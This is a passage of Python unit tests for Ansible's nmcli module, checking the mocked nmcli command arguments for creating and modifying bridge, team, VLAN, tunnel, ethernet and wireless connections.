Test : Generic connection modified with dns search
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert 'ipv4.dns-search' in args[0]
assert 'ipv6.dns-search' in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_DNS4_SEARCH, indirect=['patch_ansible_module'])
def test_generic_connection_dns_search_unchanged(mocked_generic_connection_dns_search_unchanged, capfd):
"""
Test : Generic connection with dns search unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_CONNECTION, indirect=['patch_ansible_module'])
def test_dns4_none(mocked_connection_exists, capfd):
"""
Test if DNS4 param is None
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_ZONE, indirect=['patch_ansible_module'])
def test_generic_connection_create_zone(mocked_generic_connection_create, capfd):
"""
Test : Generic connection created with zone
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert 'connection.zone' in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_ZONE, indirect=['patch_ansible_module'])
def test_generic_connection_modify_zone(mocked_generic_connection_create, capfd):
"""
Test : Generic connection modified with zone
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert 'connection.zone' in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GENERIC_ZONE, indirect=['patch_ansible_module'])
def test_generic_connection_zone_unchanged(mocked_generic_connection_zone_unchanged, capfd):
"""
Test : Generic connection with zone unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_CONNECTION, indirect=['patch_ansible_module'])
def test_zone_none(mocked_connection_exists, capfd):
"""
Test if zone param is None
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE, indirect=['patch_ansible_module'])
def test_create_bridge(mocked_generic_connection_create, capfd):
"""
Test if Bridge created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'bridge'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ipv4.addresses', '10.10.10.10/24', 'ipv4.gateway', '10.10.10.1', 'bridge.max-age', '100', 'bridge.stp', 'yes']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE, indirect=['patch_ansible_module'])
def test_mod_bridge(mocked_generic_connection_modify, capfd):
"""
Test if Bridge modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ipv4.addresses', '10.10.10.10/24', 'ipv4.gateway', '10.10.10.1', 'bridge.max-age', '100', 'bridge.stp', 'yes']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE, indirect=['patch_ansible_module'])
def test_bridge_connection_unchanged(mocked_bridge_connection_unchanged, capfd):
"""
Test : Bridge connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE_SLAVE, indirect=['patch_ansible_module'])
def test_create_bridge_slave(mocked_generic_connection_create, capfd):
"""
Test if Bridge_slave created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'bridge-slave'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['bridge-port.path-cost', '100']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE_SLAVE, indirect=['patch_ansible_module'])
def test_mod_bridge_slave(mocked_generic_connection_modify, capfd):
"""
Test if Bridge_slave modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['bridge-port.path-cost', '100']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_BRIDGE_SLAVE, indirect=['patch_ansible_module'])
def test_bridge_slave_unchanged(mocked_bridge_slave_unchanged, capfd):
"""
Test : Bridge-slave connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM, indirect=['patch_ansible_module'])
def test_team_connection_create(mocked_generic_connection_create, capfd):
"""
Test : Team connection created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'team'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
for param in ['connection.autoconnect', 'connection.interface-name', 'team0_non_existant']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM, indirect=['patch_ansible_module'])
def test_team_connection_unchanged(mocked_team_connection_unchanged, capfd):
"""
Test : Team connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM_HWADDR_POLICY_FAILS, indirect=['patch_ansible_module'])
def test_team_connection_create_hwaddr_policy_fails(mocked_generic_connection_create, capfd):
"""
Test : Team connection created
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert results.get('failed')
assert results['msg'] == "Runner-hwaddr-policy is only allowed for runner activebackup"
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM_SLAVE, indirect=['patch_ansible_module'])
def test_create_team_slave(mocked_generic_connection_create, capfd):
"""
Test if Team_slave created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'team-slave'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_slaved_device'
for param in ['connection.autoconnect', 'connection.interface-name', 'connection.master', 'team0_non_existant', 'connection.slave-type']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_TEAM_SLAVE, indirect=['patch_ansible_module'])
def test_team_slave_connection_unchanged(mocked_team_slave_connection_unchanged, capfd):
"""
Test : Team slave connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VLAN, indirect=['patch_ansible_module'])
def test_create_vlan_con(mocked_generic_connection_create, capfd):
"""
Test if VLAN created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'vlan'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ipv4.addresses', '10.10.10.10/24', 'ipv4.gateway', '10.10.10.1', 'vlan.id', '10']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VLAN, indirect=['patch_ansible_module'])
def test_mod_vlan_conn(mocked_generic_connection_modify, capfd):
"""
Test if VLAN modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ipv4.addresses', '10.10.10.10/24', 'ipv4.gateway', '10.10.10.1', 'vlan.id', '10']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VLAN, indirect=['patch_ansible_module'])
def test_vlan_connection_unchanged(mocked_vlan_connection_unchanged, capfd):
"""
Test : VLAN connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VXLAN, indirect=['patch_ansible_module'])
def test_create_vxlan(mocked_generic_connection_create, capfd):
"""
Test if vxlan created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'vxlan'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'vxlan-existent_nw_device',
'vxlan.local', '192.168.225.5', 'vxlan.remote', '192.168.225.6', 'vxlan.id', '11']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VXLAN, indirect=['patch_ansible_module'])
def test_vxlan_mod(mocked_generic_connection_modify, capfd):
"""
Test if vxlan modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['vxlan.local', '192.168.225.5', 'vxlan.remote', '192.168.225.6', 'vxlan.id', '11']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_VXLAN, indirect=['patch_ansible_module'])
def test_vxlan_connection_unchanged(mocked_vxlan_connection_unchanged, capfd):
"""
Test : VxLAN connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_IPIP, indirect=['patch_ansible_module'])
def test_create_ipip(mocked_generic_connection_create, capfd):
"""
Test if ipip created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'ip-tunnel'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'ipip-existent_nw_device',
'ip-tunnel.local', '192.168.225.5',
'ip-tunnel.mode', 'ipip',
'ip-tunnel.parent', 'non_existent_ipip_device',
'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_IPIP, indirect=['patch_ansible_module'])
def test_ipip_mod(mocked_generic_connection_modify, capfd):
"""
Test if ipip modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ip-tunnel.local', '192.168.225.5', 'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_IPIP, indirect=['patch_ansible_module'])
def test_ipip_connection_unchanged(mocked_ipip_connection_unchanged, capfd):
"""
Test : IPIP connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SIT, indirect=['patch_ansible_module'])
def test_create_sit(mocked_generic_connection_create, capfd):
"""
Test if sit created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'ip-tunnel'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'sit-existent_nw_device',
'ip-tunnel.local', '192.168.225.5',
'ip-tunnel.mode', 'sit',
'ip-tunnel.parent', 'non_existent_sit_device',
'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SIT, indirect=['patch_ansible_module'])
def test_sit_mod(mocked_generic_connection_modify, capfd):
"""
Test if sit modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ip-tunnel.local', '192.168.225.5', 'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SIT, indirect=['patch_ansible_module'])
def test_sit_connection_unchanged(mocked_sit_connection_unchanged, capfd):
"""
Test : SIT connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_DHCP, indirect=['patch_ansible_module'])
def test_eth_dhcp_client_id_con_create(mocked_generic_connection_create, capfd):
"""
Test : Ethernet connection created with DHCP_CLIENT_ID
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert 'ipv4.dhcp-client-id' in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GRE, indirect=['patch_ansible_module'])
def test_create_gre(mocked_generic_connection_create, capfd):
"""
Test if gre created
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'add'
assert args[0][3] == 'type'
assert args[0][4] == 'ip-tunnel'
assert args[0][5] == 'con-name'
assert args[0][6] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['connection.interface-name', 'gre-existent_nw_device',
'ip-tunnel.local', '192.168.225.5',
'ip-tunnel.mode', 'gre',
'ip-tunnel.parent', 'non_existent_gre_device',
'ip-tunnel.remote', '192.168.225.6',
'ip-tunnel.input-key', '1',
'ip-tunnel.output-key', '2']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GRE, indirect=['patch_ansible_module'])
def test_gre_mod(mocked_generic_connection_modify, capfd):
"""
Test if gre modified
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 1
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[0]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
args_text = list(map(to_text, args[0]))
for param in ['ip-tunnel.local', '192.168.225.5', 'ip-tunnel.remote', '192.168.225.6']:
assert param in args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_GRE, indirect=['patch_ansible_module'])
def test_gre_connection_unchanged(mocked_gre_connection_unchanged, capfd):
"""
Test : GRE connection unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_DHCP, indirect=['patch_ansible_module'])
def test_ethernet_connection_dhcp_unchanged(mocked_ethernet_connection_dhcp_unchanged, capfd):
"""
Test : Ethernet connection with DHCP_CLIENT_ID unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_STATIC, indirect=['patch_ansible_module'])
def test_modify_ethernet_dhcp_to_static(mocked_ethernet_connection_dhcp_to_static, capfd):
"""
Test : Modify ethernet connection from DHCP to static
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
args, kwargs = arg_list[1]
assert args[0][0] == '/usr/bin/nmcli'
assert args[0][1] == 'con'
assert args[0][2] == 'modify'
assert args[0][3] == 'non_existent_nw_device'
for param in ['ipv4.method', 'ipv4.gateway', 'ipv4.addresses']:
assert param in args[0]
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_STATIC, indirect=['patch_ansible_module'])
def test_create_ethernet_static(mocked_generic_connection_create, capfd):
"""
Test : Create ethernet connection with static IP configuration
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
add_args, add_kw = arg_list[0]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'ethernet'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'ethernet_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'ipv4.gateway', '10.10.10.1',
'ipv4.dns', '1.1.1.1,8.8.8.8']:
assert param in add_args_text
up_args, up_kw = arg_list[1]
assert up_args[0][0] == '/usr/bin/nmcli'
assert up_args[0][1] == 'con'
assert up_args[0][2] == 'up'
assert up_args[0][3] == 'non_existent_nw_device'
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_ETHERNET_STATIC, indirect=['patch_ansible_module'])
def test_ethernet_connection_static_unchanged(mocked_ethernet_connection_static_unchanged, capfd):
"""
Test : Ethernet connection with static IP configuration unchanged
"""
with pytest.raises(SystemExit):
nmcli.main()
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert not results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_WIRELESS, indirect=['patch_ansible_module'])
def test_create_wireless(mocked_wireless_create, capfd):
"""
Test : Create wireless connection
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless',
'quit', 'yes']:
assert param in get_available_options_data
add_args, add_kw = arg_list[1]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'wifi'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless.mode', 'ap',
'802-11-wireless.hidden', 'yes']:
assert param in add_args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SECURE_WIRELESS, indirect=['patch_ansible_module'])
def test_create_secure_wireless(mocked_secure_wireless_create, capfd):
"""
Test : Create secure wireless connection
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 3
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless-security',
'quit', 'yes']:
assert param in get_available_options_data
add_args, add_kw = arg_list[1]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'wifi'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless-security.key-mgmt', 'wpa-psk']:
assert param in add_args_text
edit_args, edit_kw = arg_list[2]
assert edit_args[0][0] == '/usr/bin/nmcli'
assert edit_args[0][1] == 'con'
assert edit_args[0][2] == 'edit'
assert edit_args[0][3] == 'non_existent_nw_device'
edit_kw_data = edit_kw['data'].split()
for param in ['802-11-wireless-security.psk', 'VERY_SECURE_PASSWORD',
'save',
'quit']:
assert param in edit_kw_data
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SECURE_WIRELESS, indirect=['patch_ansible_module'])
def test_create_secure_wireless_failure(mocked_secure_wireless_create_failure, capfd):
"""
Test : Create secure wireless connection w/failure
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 2
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless-security',
'quit', 'yes']:
assert param in get_available_options_data
add_args, add_kw = arg_list[1]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'add'
assert add_args[0][3] == 'type'
assert add_args[0][4] == 'wifi'
assert add_args[0][5] == 'con-name'
assert add_args[0][6] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless-security.key-mgmt', 'wpa-psk']:
assert param in add_args_text
out, err = capfd.readouterr()
results = json.loads(out)
assert results.get('failed')
assert 'changed' not in results
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SECURE_WIRELESS, indirect=['patch_ansible_module'])
def test_modify_secure_wireless(mocked_secure_wireless_modify, capfd):
"""
Test : Modify secure wireless connection
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 4
arg_list = nmcli.Nmcli.execute_command.call_args_list
get_available_options_args, get_available_options_kw = arg_list[0]
assert get_available_options_args[0][0] == '/usr/bin/nmcli'
assert get_available_options_args[0][1] == 'con'
assert get_available_options_args[0][2] == 'edit'
assert get_available_options_args[0][3] == 'type'
assert get_available_options_args[0][4] == 'wifi'
get_available_options_data = get_available_options_kw['data'].split()
for param in ['print', '802-11-wireless-security',
'quit', 'yes']:
assert param in get_available_options_data
show_args, show_kw = arg_list[1]
assert show_args[0][0] == '/usr/bin/nmcli'
assert show_args[0][1] == '--show-secrets'
assert show_args[0][2] == 'con'
assert show_args[0][3] == 'show'
assert show_args[0][4] == 'non_existent_nw_device'
add_args, add_kw = arg_list[2]
assert add_args[0][0] == '/usr/bin/nmcli'
assert add_args[0][1] == 'con'
assert add_args[0][2] == 'modify'
assert add_args[0][3] == 'non_existent_nw_device'
add_args_text = list(map(to_text, add_args[0]))
for param in ['connection.interface-name', 'wireless_non_existant',
'ipv4.addresses', '10.10.10.10/24',
'802-11-wireless.ssid', 'Brittany',
'802-11-wireless-security.key-mgmt', 'wpa-psk']:
assert param in add_args_text
edit_args, edit_kw = arg_list[3]
assert edit_args[0][0] == '/usr/bin/nmcli'
assert edit_args[0][1] == 'con'
assert edit_args[0][2] == 'edit'
assert edit_args[0][3] == 'non_existent_nw_device'
edit_kw_data = edit_kw['data'].split()
for param in ['802-11-wireless-security.psk', 'VERY_SECURE_PASSWORD',
'save',
'quit']:
assert param in edit_kw_data
out, err = capfd.readouterr()
results = json.loads(out)
assert not results.get('failed')
assert results['changed']
@pytest.mark.parametrize('patch_ansible_module', TESTCASE_SECURE_WIRELESS, indirect=['patch_ansible_module'])
def test_modify_secure_wireless_failure(mocked_secure_wireless_modify_failure, capfd):
"""
Test : Modify secure wireless connection w/failure
"""
with pytest.raises(SystemExit):
nmcli.main()
assert nmcli.Nmcli.execute_command.call_count == 3
arg_list = nmcli.Nmcli.execute_command.call_args_list
